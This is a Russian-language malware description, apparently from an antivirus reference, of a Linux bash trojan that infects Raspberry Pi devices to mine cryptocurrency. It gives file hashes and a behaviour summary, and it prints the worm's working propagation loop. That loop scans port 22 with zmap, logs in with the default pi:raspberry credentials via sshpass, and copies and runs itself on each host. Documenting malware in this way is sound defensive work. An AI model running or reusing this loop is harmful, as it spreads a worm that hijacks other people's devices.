SHA1:
- 00f4fd10d2eff990929e0850b61e23e1819a9ea4
- 185b5b2ad16b046eebd54b8b87b9e44e1b51dec9
- 2961159e48dfdb9ccca82f0053391c727c31b017
Троянец для ОС Linux, представляющий собой bash-скрипт, в котором хранится программа-майнер, сжатая gzip и зашифрованная base64. При запуске скрипт завершает ряд процессов, устанавливает необходимые для своей работы библиотеки, а также zmap и sshpass.
Меняет пароль для пользователя "pi" на "\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1".
Далее в бесконечном цикле с помощью zmap ищет сетевые узлы с открытым портом 22, после чего с помощью sshpass пытается авторизоваться на них c login:password pi:raspberry, а затем – сохранить и запустить свою копию.
NAME=`mktemp -u 'XXXXXXXX'`
while [ true ]; do
FILE=`mktemp`
zmap -p 22 -o $FILE -n 100000
killall ssh scp
for IP in `cat $FILE`
do
sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /tmp/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
done
rm -rf $FILE
sleep 10
done